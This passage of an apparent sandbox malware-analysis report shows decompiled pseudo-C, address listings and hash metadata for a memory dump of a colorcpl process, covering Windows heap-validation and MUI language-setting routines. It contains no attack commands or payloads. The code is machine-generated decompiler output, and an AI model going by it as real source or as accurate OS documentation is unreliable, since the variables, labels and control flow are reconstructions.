                                                                                                							_v48 = _t276;
                                                                                                							_t277 = E06E61370(_t276, 0x6df4e90);
                                                                                                							_pop(_t257);
                                                                                                							if(_t277 == 0) {
                                                                                                								L38:
                                                                                                								_t170 = _v48;
                                                                                                								if( *_v48 != 0) {
                                                                                                									E06E5BB40(0,  &_v68, _t170);
                                                                                                									if(L06E243C0( &_v68,  &_v24) != 0) {
                                                                                                										_t280 =  &(_t280[0]);
                                                                                                									}
                                                                                                								}
                                                                                                								if(_t280 == 0) {
                                                                                                									_t280 = 0;
                                                                                                									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                                									_v44 = 0;
                                                                                                									_v32 = 0;
                                                                                                								} else {
                                                                                                									_t280 = 0;
                                                                                                								}
                                                                                                								_t174 = _v8;
                                                                                                								if(_v8 != 0) {
                                                                                                									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                                								}
                                                                                                								_v8 = _t280;
                                                                                                								goto L46;
                                                                                                							}
                                                                                                							_t243 = _v48;
                                                                                                							do {
                                                                                                								 *_t277 = 0;
                                                                                                								_t278 = _t277 + 2;
                                                                                                								E06E5BB40(_t257,  &_v68, _t243);
                                                                                                								if(L06E243C0( &_v68,  &_v24) != 0) {
                                                                                                									_t280 =  &(_t280[0]);
                                                                                                								}
                                                                                                								_t243 = _t278;
                                                                                                								_t277 = E06E61370(_t278, 0x6df4e90);
                                                                                                								_pop(_t257);
                                                                                                							} while (_t277 != 0);
                                                                                                							_v48 = _t243;
                                                                                                							_t242 = _v52;
                                                                                                							goto L38;
                                                                                                						}
                                                                                                					}
                                                                                                					_t191 = _v12;
                                                                                                					_t260 = _v12 + 4;
                                                                                                					_v28 = _t260;
                                                                                                					if(_t260 == 0) {
                                                                                                						_t275 = _t280;
                                                                                                						_v16 = _t280;
                                                                                                					} else {
                                                                                                						_t275 = L06E34620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                                						_t191 = _v12;
                                                                                                						_v16 = _t275;
                                                                                                					}
                                                                                                					if(_t275 == 0) {
                                                                                                						_v28 = _t280;
                                                                                                						_t280 = 0xc0000017;
                                                                                                						goto L47;
                                                                                                					} else {
                                                                                                						E06E5F3E0(_t275, _v8, _t191);
                                                                                                						_t285 = _t285 + 0xc;
                                                                                                						_v48 = _t275;
                                                                                                						_t279 = _t280;
                                                                                                						_t281 = E06E61370(_v16, 0x6df4e90);
                                                                                                						_pop(_t262);
                                                                                                						if(_t281 != 0) {
                                                                                                							_t244 = _v48;
                                                                                                							do {
                                                                                                								 *_t281 = 0;
                                                                                                								_t282 = _t281 + 2;
                                                                                                								E06E5BB40(_t262,  &_v68, _t244);
                                                                                                								if(L06E243C0( &_v68,  &_v24) != 0) {
                                                                                                									_t279 =  &(_t279[0]);
                                                                                                								}
                                                                                                								_t244 = _t282;
                                                                                                								_t281 = E06E61370(_t282, 0x6df4e90);
                                                                                                								_pop(_t262);
                                                                                                							} while (_t281 != 0);
                                                                                                							_v48 = _t244;
                                                                                                							_t242 = _v52;
                                                                                                						}
                                                                                                						_t201 = _v48;
                                                                                                						_t280 = 0;
                                                                                                						if( *_v48 != 0) {
                                                                                                							E06E5BB40(_t262,  &_v68, _t201);
                                                                                                							if(L06E243C0( &_v68,  &_v24) != 0) {
                                                                                                								_t279 =  &(_t279[0]);
                                                                                                							}
                                                                                                						}
                                                                                                						if(_t279 == 0) {
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                                							_v28 = _t280;
                                                                                                							_v16 = _t280;
                                                                                                						}
                                                                                                						_t202 = _v8;
                                                                                                						if(_v8 != 0) {
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                                						}
                                                                                                						_v8 = _t280;
                                                                                                						goto L28;
                                                                                                					}
                                                                                                				}
                                                                                                				_t214 = _v12;
                                                                                                				_t264 = _v12 + 4;
                                                                                                				_v40 = _t264;
                                                                                                				if(_t264 == 0) {
                                                                                                					_v20 = _t280;
                                                                                                				} else {
                                                                                                					_t236 = L06E34620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                                					_t280 = _t236;
                                                                                                					_v20 = _t236;
                                                                                                					_t214 = _v12;
                                                                                                				}
                                                                                                				if(_t280 == 0) {
                                                                                                					_t161 = 0;
                                                                                                					_t280 = 0xc0000017;
                                                                                                					_v40 = 0;
                                                                                                					goto L48;
                                                                                                				} else {
                                                                                                					E06E5F3E0(_t280, _v8, _t214);
                                                                                                					_t285 = _t285 + 0xc;
                                                                                                					_v48 = _t280;
                                                                                                					_t283 = E06E61370(_t280, 0x6df4e90);
                                                                                                					_pop(_t267);
                                                                                                					if(_t283 != 0) {
                                                                                                						_t245 = _v48;
                                                                                                						do {
                                                                                                							 *_t283 = 0;
                                                                                                							_t284 = _t283 + 2;
                                                                                                							E06E5BB40(_t267,  &_v68, _t245);
                                                                                                							if(L06E243C0( &_v68,  &_v24) != 0) {
                                                                                                								_t275 = _t275 + 1;
                                                                                                							}
                                                                                                							_t245 = _t284;
                                                                                                							_t283 = E06E61370(_t284, 0x6df4e90);
                                                                                                							_pop(_t267);
                                                                                                						} while (_t283 != 0);
                                                                                                						_v48 = _t245;
                                                                                                						_t242 = _v52;
                                                                                                					}
                                                                                                					_t224 = _v48;
                                                                                                					_t280 = 0;
                                                                                                					if( *_v48 != 0) {
                                                                                                						E06E5BB40(_t267,  &_v68, _t224);
                                                                                                						if(L06E243C0( &_v68,  &_v24) != 0) {
                                                                                                							_t275 = _t275 + 1;
                                                                                                						}
                                                                                                					}
                                                                                                					if(_t275 == 0) {
                                                                                                						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                                						_v40 = _t280;
                                                                                                						_v20 = _t280;
                                                                                                					}
                                                                                                					_t225 = _v8;
                                                                                                					if(_v8 != 0) {
                                                                                                						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                                					}
                                                                                                					_v8 = _t280;
                                                                                                					goto L16;
                                                                                                				}
                                                                                                			}










































                                                                                                0x06e24003
                                                                                                0x06e24005
                                                                                                0x06e24005
                                                                                                0x06e2400c
                                                                                                0x06e24013
                                                                                                0x06e24016
                                                                                                0x06e24017
                                                                                                0x06e2401b
                                                                                                0x06e2401e
                                                                                                0x00000000
                                                                                                0x06e2401e
                                                                                                0x06e23fb6
                                                                                                0x06e23eb1
                                                                                                0x06e23eb4
                                                                                                0x06e23eb7
                                                                                                0x06e23ebc
                                                                                                0x06e782a9
                                                                                                0x06e782ab
                                                                                                0x06e23ec2
                                                                                                0x06e23ed3
                                                                                                0x06e23ed5
                                                                                                0x06e23ed8
                                                                                                0x06e23ed8
                                                                                                0x06e23edd
                                                                                                0x06e782b3
                                                                                                0x06e782b6
                                                                                                0x00000000
                                                                                                0x06e23ee3
                                                                                                0x06e23ee8
                                                                                                0x06e23eed
                                                                                                0x06e23ef0
                                                                                                0x06e23ef3
                                                                                                0x06e23f02
                                                                                                0x06e23f05
                                                                                                0x06e23f08
                                                                                                0x06e782c0
                                                                                                0x06e782c3
                                                                                                0x06e782c5
                                                                                                0x06e782c8
                                                                                                0x06e782d0
                                                                                                0x06e782e4
                                                                                                0x06e782e6
                                                                                                0x06e782e6
                                                                                                0x06e782ed
                                                                                                0x06e782f4
                                                                                                0x06e782f7
                                                                                                0x06e782f8
                                                                                                0x06e782fc
                                                                                                0x06e782ff
                                                                                                0x06e782ff
                                                                                                0x06e23f0e
                                                                                                0x06e23f11
                                                                                                0x06e23f16
                                                                                                0x06e23f1d
                                                                                                0x06e23f31
                                                                                                0x06e78307
                                                                                                0x06e78307
                                                                                                0x06e23f31
                                                                                                0x06e23f39
                                                                                                0x06e23f48
                                                                                                0x06e23f4d
                                                                                                0x06e23f50
                                                                                                0x06e23f50
                                                                                                0x06e23f53
                                                                                                0x06e23f58
                                                                                                0x06e23f65
                                                                                                0x06e23f65
                                                                                                0x06e23f6a
                                                                                                0x00000000
                                                                                                0x06e23f6a
                                                                                                0x06e23edd
                                                                                                0x06e23dda
                                                                                                0x06e23ddd
                                                                                                0x06e23de0
                                                                                                0x06e23de5
                                                                                                0x06e78245
                                                                                                0x06e23deb
                                                                                                0x06e23df7
                                                                                                0x06e23dfc
                                                                                                0x06e23dfe
                                                                                                0x06e23e01
                                                                                                0x06e23e01
                                                                                                0x06e23e06
                                                                                                0x06e7824d
                                                                                                0x06e7824f
                                                                                                0x06e78254
                                                                                                0x00000000
                                                                                                0x06e23e0c
                                                                                                0x06e23e11
                                                                                                0x06e23e16
                                                                                                0x06e23e19
                                                                                                0x06e23e29
                                                                                                0x06e23e2c
                                                                                                0x06e23e2f
                                                                                                0x06e7825c
                                                                                                0x06e7825f
                                                                                                0x06e78261
                                                                                                0x06e78264
                                                                                                0x06e7826c
                                                                                                0x06e78280
                                                                                                0x06e78282
                                                                                                0x06e78282
                                                                                                0x06e78289
                                                                                                0x06e78290
                                                                                                0x06e78293
                                                                                                0x06e78294
                                                                                                0x06e78298
                                                                                                0x06e7829b
                                                                                                0x06e7829b
                                                                                                0x06e23e35
                                                                                                0x06e23e38
                                                                                                0x06e23e3d
                                                                                                0x06e23e44
                                                                                                0x06e23e58
                                                                                                0x06e782a3
                                                                                                0x06e782a3
                                                                                                0x06e23e58
                                                                                                0x06e23e60
                                                                                                0x06e23e6f
                                                                                                0x06e23e74
                                                                                                0x06e23e77
                                                                                                0x06e23e77
                                                                                                0x06e23e7a
                                                                                                0x06e23e7f
                                                                                                0x06e23e8c
                                                                                                0x06e23e8c
                                                                                                0x06e23e91
                                                                                                0x00000000
                                                                                                0x06e23e91

                                                                                                Strings
                                                                                                • WindowsExcludedProcs, xrefs: 06E23D6F
                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 06E23DC0
                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 06E23E97
                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 06E23D8C
                                                                                                • Kernel-MUI-Language-SKU, xrefs: 06E23F70
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                • API String ID: 0-258546922
                                                                                                • Opcode ID: 2b806920ea8e01b53a5fcd21de43b2ec1c7732aea145053984fca5a9c1f2e045
                                                                                                • Instruction ID: f20fd3fd5aa86836b79c8891a3aec74a7f4cbcf9992b41371bf0cc7e45e3137f
                                                                                                • Opcode Fuzzy Hash: 2b806920ea8e01b53a5fcd21de43b2ec1c7732aea145053984fca5a9c1f2e045
                                                                                                • Instruction Fuzzy Hash: B0F14B72D10729EFCB91DF98C9849EFBBBEFF08650F15106AE915A7250E6349E01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 29%
                                                                                                			E06E140E1(void* __edx) {
                                                                                                				void* _t19;
                                                                                                				void* _t29;
                                                                                                
                                                                                                				_t28 = _t19;
                                                                                                				_t29 = __edx;
                                                                                                				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                						_push("HEAP: ");
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					E06E1B150("Invalid heap signature for heap at %p", _t28);
                                                                                                					if(_t29 != 0) {
                                                                                                						E06E1B150(", passed to %s", _t29);
                                                                                                					}
                                                                                                					_push("\n");
                                                                                                					E06E1B150();
                                                                                                					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                						 *0x6f06378 = 1;
                                                                                                						asm("int3");
                                                                                                						 *0x6f06378 = 0;
                                                                                                					}
                                                                                                					return 0;
                                                                                                				}
                                                                                                				return 1;
                                                                                                			}






                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                • API String ID: 0-188067316
                                                                                                • Opcode ID: a989d65ae8a021ec2c21e9349ca97aae9a0c74b4a8d87f514b08ee94476d83c3
                                                                                                • Instruction ID: e117f7e1ba513224ef6623a989f46084df5c72c28ebecfe1cc339cdeb17b7091
                                                                                                • Opcode Fuzzy Hash: a989d65ae8a021ec2c21e9349ca97aae9a0c74b4a8d87f514b08ee94476d83c3
                                                                                                • Instruction Fuzzy Hash: 31014C726203C0BEE3F59764E80EF9377E8DB05B30F1A9029F1044BB40DAA4D449E251
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E06E3A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                                                                				void* _v5;
                                                                                                				signed short _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				signed int _v20;
                                                                                                				signed short _v24;
                                                                                                				signed short _v28;
                                                                                                				signed int _v32;
                                                                                                				signed short _v36;
                                                                                                				signed int _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				signed short* _v52;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t131;
                                                                                                				signed char _t134;
                                                                                                				signed int _t138;
                                                                                                				char _t141;
                                                                                                				signed short _t142;
                                                                                                				void* _t146;
                                                                                                				signed short _t147;
                                                                                                				intOrPtr* _t149;
                                                                                                				intOrPtr _t156;
                                                                                                				signed int _t167;
                                                                                                				signed int _t168;
                                                                                                				signed short* _t173;
                                                                                                				signed short _t174;
                                                                                                				intOrPtr* _t182;
                                                                                                				signed short _t184;
                                                                                                				intOrPtr* _t187;
                                                                                                				intOrPtr _t197;
                                                                                                				intOrPtr _t206;
                                                                                                				intOrPtr _t210;
                                                                                                				signed short _t211;
                                                                                                				intOrPtr* _t212;
                                                                                                				signed short _t214;
                                                                                                				signed int _t216;
                                                                                                				intOrPtr _t217;
                                                                                                				signed char _t225;
                                                                                                				signed short _t235;
                                                                                                				signed int _t237;
                                                                                                				intOrPtr* _t238;
                                                                                                				signed int _t242;
                                                                                                				unsigned int _t245;
                                                                                                				signed int _t251;
                                                                                                				intOrPtr* _t252;
                                                                                                				signed int _t253;
                                                                                                				intOrPtr* _t255;
                                                                                                				signed int _t256;
                                                                                                				void* _t257;
                                                                                                				void* _t260;
                                                                                                
                                                                                                				_t256 = __edx;
                                                                                                				_t206 = __ecx;
                                                                                                				_t235 = _a4;
                                                                                                				_v44 = __ecx;
                                                                                                				_v24 = _t235;
                                                                                                				if(_t235 == 0) {
                                                                                                					L41:
                                                                                                					return _t131;
                                                                                                				}
                                                                                                				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                                                                				if(_t251 == 0) {
                                                                                                					__eflags =  *0x6f08748 - 1;
                                                                                                					if( *0x6f08748 >= 1) {
                                                                                                						__eflags =  *(__edx + 2) & 0x00000008;
                                                                                                						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                                                                							_t110 = _t256 + 0xfff; // 0xfe7
                                                                                                							__eflags = (_t110 & 0xfffff000) - __edx;
                                                                                                							if((_t110 & 0xfffff000) != __edx) {
                                                                                                								_t197 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t197 + 0xc);
                                                                                                								if( *(_t197 + 0xc) == 0) {
                                                                                                									_push("HEAP: ");
                                                                                                									E06E1B150();
                                                                                                									_t260 = _t257 + 4;
                                                                                                								} else {
                                                                                                									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                									_t260 = _t257 + 8;
                                                                                                								}
                                                                                                								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                                                                								E06E1B150();
                                                                                                								_t257 = _t260 + 4;
                                                                                                								__eflags =  *0x6f07bc8;
                                                                                                								if(__eflags == 0) {
                                                                                                									E06ED2073(_t206, 1, _t251, __eflags);
                                                                                                								}
                                                                                                								_t235 = _v24;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                                                                				if(_t134 == 0) {
                                                                                                					_t210 = _t206;
                                                                                                					_v48 = _t206;
                                                                                                				} else {
                                                                                                					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                					_v48 = _t210;
                                                                                                				}
                                                                                                				_v5 =  *(_t256 + 2);
                                                                                                				do {
                                                                                                					if(_t235 > 0xfe00) {
                                                                                                						_v12 = 0xfe00;
                                                                                                						__eflags = _t235 - 0xfe01;
                                                                                                						if(_t235 == 0xfe01) {
                                                                                                							_v12 = 0xfdf0;
                                                                                                						}
                                                                                                						_t138 = 0;
                                                                                                					} else {
                                                                                                						_v12 = _t235 & 0x0000ffff;
                                                                                                						_t138 = _v5;
                                                                                                					}
                                                                                                					 *(_t256 + 2) = _t138;
                                                                                                					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                                                                					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                                                                					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                                                                						_t141 = 0;
                                                                                                					} else {
                                                                                                						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                                                                						_v40 = _t141;
                                                                                                						if(_t141 >= 0xfe) {
                                                                                                							_push(_t210);
                                                                                                							E06EDA80D(_t236, _t256, _t210, 0);
                                                                                                							_t141 = _v40;
                                                                                                						}
                                                                                                					}
                                                                                                					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                                                                					 *((char*)(_t256 + 6)) = _t141;
                                                                                                					_t142 = _v12;
                                                                                                					 *_t256 = _t142;
                                                                                                					 *(_t256 + 3) = 0;
                                                                                                					_t211 = _t142 & 0x0000ffff;
                                                                                                					 *((char*)(_t256 + 7)) = 0;
                                                                                                					_v20 = _t211;
                                                                                                					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                                                                						_t119 = _t256 + 0x10; // -8
                                                                                                						E06E6D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                                                                						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                                                                						_t211 = _v20;
                                                                                                					}
                                                                                                					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                                					if(_t252 == 0) {
                                                                                                						L56:
                                                                                                						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                                                                						_t146 = _t206 + 0xc0;
                                                                                                						goto L19;
                                                                                                					} else {
                                                                                                						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                                                                							L15:
                                                                                                							_t185 = _t211;
                                                                                                							goto L17;
                                                                                                						} else {
                                                                                                							while(1) {
                                                                                                								_t187 =  *_t252;
                                                                                                								if(_t187 == 0) {
                                                                                                									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                                									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                                									goto L17;
                                                                                                								}
                                                                                                								_t252 = _t187;
                                                                                                								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L15;
                                                                                                							}
                                                                                                							while(1) {
                                                                                                								L17:
                                                                                                								_t212 = E06E3AB40(_t206, _t252, 1, _t185, _t211);
                                                                                                								if(_t212 != 0) {
                                                                                                									_t146 = _t206 + 0xc0;
                                                                                                									break;
                                                                                                								}
                                                                                                								_t252 =  *_t252;
                                                                                                								_t211 = _v20;
                                                                                                								_t185 =  *(_t252 + 0x14);
                                                                                                							}
                                                                                                							L19:
                                                                                                							if(_t146 != _t212) {
                                                                                                								_t237 =  *(_t206 + 0x4c);
                                                                                                								_t253 = _v20;
                                                                                                								while(1) {
                                                                                                									__eflags = _t237;
                                                                                                									if(_t237 == 0) {
                                                                                                										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t184 =  *(_t212 - 8);
                                                                                                										_t237 =  *(_t206 + 0x4c);
                                                                                                										__eflags = _t184 & _t237;
                                                                                                										if((_t184 & _t237) != 0) {
                                                                                                											_t184 = _t184 ^  *(_t206 + 0x50);
                                                                                                											__eflags = _t184;
                                                                                                										}
                                                                                                										_t147 = _t184 & 0x0000ffff;
                                                                                                									}
                                                                                                									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                                                                									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                                                                										goto L20;
                                                                                                									}
                                                                                                									_t212 =  *_t212;
                                                                                                									__eflags = _t206 + 0xc0 - _t212;
                                                                                                									if(_t206 + 0xc0 != _t212) {
                                                                                                										continue;
                                                                                                									} else {
                                                                                                										goto L20;
                                                                                                									}
                                                                                                									goto L56;
                                                                                                								}
                                                                                                							}
                                                                                                							L20:
                                                                                                							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                                                                							_t33 = _t256 + 8; // -16
                                                                                                							_t238 = _t33;
                                                                                                							_t254 =  *_t149;
                                                                                                							if( *_t149 != _t212) {
                                                                                                								_push(_t212);
                                                                                                								E06EDA80D(0, _t212, 0, _t254);
                                                                                                							} else {
                                                                                                								 *_t238 = _t212;
                                                                                                								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                                                                								 *_t149 = _t238;
                                                                                                								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                                                                							}
                                                                                                							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                                                                							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                                							if(_t255 == 0) {
                                                                                                								L36:
                                                                                                								if( *(_t206 + 0x4c) != 0) {
                                                                                                									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                                                                									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                                                                								}
                                                                                                								_t210 = _v48;
                                                                                                								_t251 = _v12 & 0x0000ffff;
                                                                                                								_t131 = _v20;
                                                                                                								_t235 = _v24 - _t131;
                                                                                                								_v24 = _t235;
                                                                                                								_t256 = _t256 + _t131 * 8;
                                                                                                								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                                                                									goto L41;
                                                                                                								} else {
                                                                                                									goto L39;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t216 =  *_t256 & 0x0000ffff;
                                                                                                								_v28 = _t216;
                                                                                                								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                                                                									L28:
                                                                                                									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                                                                									_v32 = _t242;
                                                                                                									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                                                                										_t167 = _t242 + _t242;
                                                                                                									} else {
                                                                                                										_t167 = _t242;
                                                                                                									}
                                                                                                									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                                                                									_t168 = _t167 << 2;
                                                                                                									_v40 = _t168;
                                                                                                									_t206 = _v44;
                                                                                                									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                                                                									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                                                                										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                                                                									}
                                                                                                									_t217 = _v16;
                                                                                                									if(_t217 != 0) {
                                                                                                										_t173 = _t217 - 8;
                                                                                                										_v52 = _t173;
                                                                                                										_t174 =  *_t173;
                                                                                                										__eflags =  *(_t206 + 0x4c);
                                                                                                										if( *(_t206 + 0x4c) != 0) {
                                                                                                											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                                                                											_v36 = _t245;
                                                                                                											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                                                                											__eflags = _t245 >> 0x18 - _t225;
                                                                                                											if(_t245 >> 0x18 != _t225) {
                                                                                                												_push(_t225);
                                                                                                												E06EDA80D(_t206, _v52, 0, 0);
                                                                                                											}
                                                                                                											_t174 = _v36;
                                                                                                											_t217 = _v16;
                                                                                                											_t242 = _v32;
                                                                                                										}
                                                                                                										_v28 = _v28 - (_t174 & 0x0000ffff);
                                                                                                										__eflags = _v28;
                                                                                                										if(_v28 > 0) {
                                                                                                											goto L34;
                                                                                                										} else {
                                                                                                											goto L33;
                                                                                                										}
                                                                                                									} else {
                                                                                                										L33:
                                                                                                										_t58 = _t256 + 8; // -16
                                                                                                										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                                                                										_t206 = _v44;
                                                                                                										_t217 = _v16;
                                                                                                										L34:
                                                                                                										if(_t217 == 0) {
                                                                                                											asm("bts eax, edx");
                                                                                                										}
                                                                                                										goto L36;
                                                                                                									}
                                                                                                								} else {
                                                                                                									goto L24;
                                                                                                								}
                                                                                                								while(1) {
                                                                                                									L24:
                                                                                                									_t182 =  *_t255;
                                                                                                									if(_t182 == 0) {
                                                                                                										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                                                                										__eflags = _t216;
                                                                                                										goto L28;
                                                                                                									}
                                                                                                									_t255 = _t182;
                                                                                                									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                                                                										continue;
                                                                                                									} else {
                                                                                                										goto L28;
                                                                                                									}
                                                                                                								}
                                                                                                								goto L28;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					L39:
                                                                                                				} while (_t235 != 0);
                                                                                                				_t214 = _v12;
                                                                                                				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                                                                				 *(_t256 + 4) = _t131;
                                                                                                				if(_t214 == 0) {
                                                                                                					__eflags =  *0x6f08748 - 1;
                                                                                                					if( *0x6f08748 >= 1) {
                                                                                                						_t127 = _t256 + 0xfff; // 0xfff
                                                                                                						_t131 = _t127 & 0xfffff000;
                                                                                                						__eflags = _t131 - _t256;
                                                                                                						if(_t131 != _t256) {
                                                                                                							_t156 =  *[fs:0x30];
                                                                                                							__eflags =  *(_t156 + 0xc);
                                                                                                							if( *(_t156 + 0xc) == 0) {
                                                                                                								_push("HEAP: ");
                                                                                                								E06E1B150();
                                                                                                							} else {
                                                                                                								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                							}
                                                                                                							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                                                                							_t131 = E06E1B150();
                                                                                                							__eflags =  *0x6f07bc8;
                                                                                                							if(__eflags == 0) {
                                                                                                								_t131 = E06ED2073(_t206, 1, _t251, __eflags);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				goto L41;
                                                                                                			}























































                                                                                                0x00000000
                                                                                                0x06e3a983
                                                                                                0x06e3a983
                                                                                                0x06e3a983
                                                                                                0x06e3a987
                                                                                                0x06e3a995
                                                                                                0x06e3a995
                                                                                                0x06e3a995
                                                                                                0x06e3a995
                                                                                                0x06e3a989
                                                                                                0x06e3a98e
                                                                                                0x00000000
                                                                                                0x06e3a990
                                                                                                0x00000000
                                                                                                0x06e3a990
                                                                                                0x06e3a98e
                                                                                                0x00000000
                                                                                                0x06e3a983
                                                                                                0x06e3a972
                                                                                                0x06e3a90a
                                                                                                0x06e3aa34
                                                                                                0x06e3aa34
                                                                                                0x06e3aa40
                                                                                                0x06e3aa43
                                                                                                0x06e3aa46
                                                                                                0x06e3aa4d
                                                                                                0x06e823ab
                                                                                                0x06e823b2
                                                                                                0x06e823b8
                                                                                                0x06e823be
                                                                                                0x06e823c3
                                                                                                0x06e823c5
                                                                                                0x06e823cb
                                                                                                0x06e823d1
                                                                                                0x06e823d5
                                                                                                0x06e823f6
                                                                                                0x06e823fb
                                                                                                0x06e823d7
                                                                                                0x06e823ec
                                                                                                0x06e823f1
                                                                                                0x06e82403
                                                                                                0x06e82408
                                                                                                0x06e82410
                                                                                                0x06e82417
                                                                                                0x06e82422
                                                                                                0x06e82422
                                                                                                0x06e82417
